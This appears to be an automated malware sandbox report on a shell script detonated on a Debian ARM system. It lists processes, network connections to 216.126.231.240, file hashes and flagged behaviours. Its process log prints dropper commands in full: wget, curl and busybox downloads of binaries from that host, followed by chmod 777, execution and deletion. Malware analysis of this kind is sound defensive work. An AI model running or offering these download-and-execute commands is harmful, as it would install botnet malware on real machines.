[rm IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]

/usr/bin/wget

[wget http://216.126.231.240/bins/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]

/bin/chmod

[chmod 777 LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]

/tmp/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g

[./LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]

/bin/rm

[rm LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]

Network

Country Destination Domain Proto
US 151.101.1.91:443 tcp
GB 185.125.188.62:443 tcp
GB 185.125.188.62:443 tcp
US 1.1.1.1:53 ocp-ingress.fastly.gnome.org udp
US 151.101.1.91:443 ocp-ingress.fastly.gnome.org tcp
US 216.126.231.240:80 216.126.231.240 tcp
N/A 224.0.0.251:5353 udp
GB 84.17.50.8:443 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp

Files

/tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-20 03:52

Reported

2024-11-20 03:54

Platform

debian9-armhf-20240611-en

Max time kernel

47s

Max time network

51s

Command Line

[/tmp/fbca926a194f3a16d4f651f15e8348a9b3c95ba55cba7c8c59266451178da939.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J /tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J N/A
N/A /tmp/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d /tmp/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d N/A
N/A /tmp/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ /tmp/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ N/A
N/A /tmp/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0 /tmp/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0 N/A
N/A /tmp/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ /tmp/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ N/A
N/A /tmp/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g /tmp/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g N/A
N/A /tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto /tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto N/A
N/A /tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC /tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC N/A
N/A /tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev /tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev N/A
N/A /tmp/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD /tmp/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD N/A
N/A /tmp/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1 /tmp/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1 N/A
N/A /tmp/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL /tmp/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL N/A
N/A /tmp/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz /tmp/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz N/A
N/A /tmp/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0 /tmp/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0 N/A
N/A /tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto /tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto N/A
N/A /tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC /tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC N/A
N/A /tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev /tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev /usr/bin/curl N/A
File opened for modification /tmp/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz /usr/bin/curl N/A
File opened for modification /tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto /usr/bin/curl N/A
File opened for modification /tmp/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d /usr/bin/curl N/A
File opened for modification /tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC /usr/bin/curl N/A
File opened for modification /tmp/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1 /usr/bin/curl N/A
File opened for modification /tmp/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL /usr/bin/curl N/A
File opened for modification /tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J /usr/bin/curl N/A
File opened for modification /tmp/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0 /usr/bin/curl N/A
File opened for modification /tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev /usr/bin/curl N/A
File opened for modification /tmp/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ /usr/bin/curl N/A
File opened for modification /tmp/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0 /usr/bin/curl N/A
File opened for modification /tmp/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ /usr/bin/curl N/A
File opened for modification /tmp/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g /usr/bin/curl N/A
File opened for modification /tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto /usr/bin/curl N/A
File opened for modification /tmp/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD /usr/bin/curl N/A
File opened for modification /tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC /usr/bin/curl N/A

Processes

/tmp/fbca926a194f3a16d4f651f15e8348a9b3c95ba55cba7c8c59266451178da939.sh

[/tmp/fbca926a194f3a16d4f651f15e8348a9b3c95ba55cba7c8c59266451178da939.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://216.126.231.240/bins/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]

/bin/chmod

[chmod 777 GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]

/tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J

[./GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]

/bin/rm

[rm GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]

/usr/bin/wget

[wget http://216.126.231.240/bins/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]

/bin/chmod

[chmod 777 ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]

/tmp/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d

[./ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]

/bin/rm

[rm ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]

/usr/bin/wget

[wget http://216.126.231.240/bins/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]

/bin/chmod

[chmod 777 1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]

/tmp/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ

[./1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]

/bin/rm

[rm 1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]

/usr/bin/wget

[wget http://216.126.231.240/bins/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]

/bin/chmod

[chmod 777 i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]

/tmp/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0

[./i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]

/bin/rm

[rm i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]

/usr/bin/wget

[wget http://216.126.231.240/bins/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]

/bin/chmod

[chmod 777 IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]

/tmp/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ

[./IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]

/bin/rm

[rm IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]

/usr/bin/wget

[wget http://216.126.231.240/bins/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]

/bin/chmod

[chmod 777 LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]

/tmp/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g

[./LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]

/bin/rm

[rm LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]

/usr/bin/wget

[wget http://216.126.231.240/bins/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]

/bin/chmod

[chmod 777 KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]

/tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto

[./KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]

/bin/rm

[rm KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]

/usr/bin/wget

[wget http://216.126.231.240/bins/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]

/bin/chmod

[chmod 777 mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]

/tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC

[./mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]

/bin/rm

[rm mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]

/usr/bin/wget

[wget http://216.126.231.240/bins/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]

/bin/chmod

[chmod 777 yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]

/tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev

[./yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]

/bin/rm

[rm yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]

/usr/bin/wget

[wget http://216.126.231.240/bins/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]

/bin/chmod

[chmod 777 SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]

/tmp/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD

[./SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]

/bin/rm

[rm SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]

/usr/bin/wget

[wget http://216.126.231.240/bins/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]

/bin/chmod

[chmod 777 YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]

/tmp/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1

[./YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]

/bin/rm

[rm YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]

/usr/bin/wget

[wget http://216.126.231.240/bins/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]

/bin/chmod

[chmod 777 IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]

/tmp/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL

[./IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]

/bin/rm

[rm IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]

/usr/bin/wget

[wget http://216.126.231.240/bins/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]

/bin/chmod

[chmod 777 pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]

/tmp/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz

[./pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]

/bin/rm

[rm pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]

/usr/bin/wget

[wget http://216.126.231.240/bins/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]

/bin/chmod

[chmod 777 O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]

/tmp/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0

[./O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]

/bin/rm

[rm O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]

/usr/bin/wget

[wget http://216.126.231.240/bins/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]

/bin/chmod

[chmod 777 KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]

/tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto

[./KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]

/bin/rm

[rm KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]

/usr/bin/wget

[wget http://216.126.231.240/bins/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]

/bin/chmod

[chmod 777 mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]

/tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC

[./mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]

/bin/rm

[rm mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]

/usr/bin/wget

[wget http://216.126.231.240/bins/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]

/bin/chmod

[chmod 777 yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]

/tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev

[./yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]

/bin/rm

[rm yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]

/usr/bin/wget

[wget http://216.126.231.240/bins/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]

Network

Country Destination Domain Proto
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp

Files

/tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
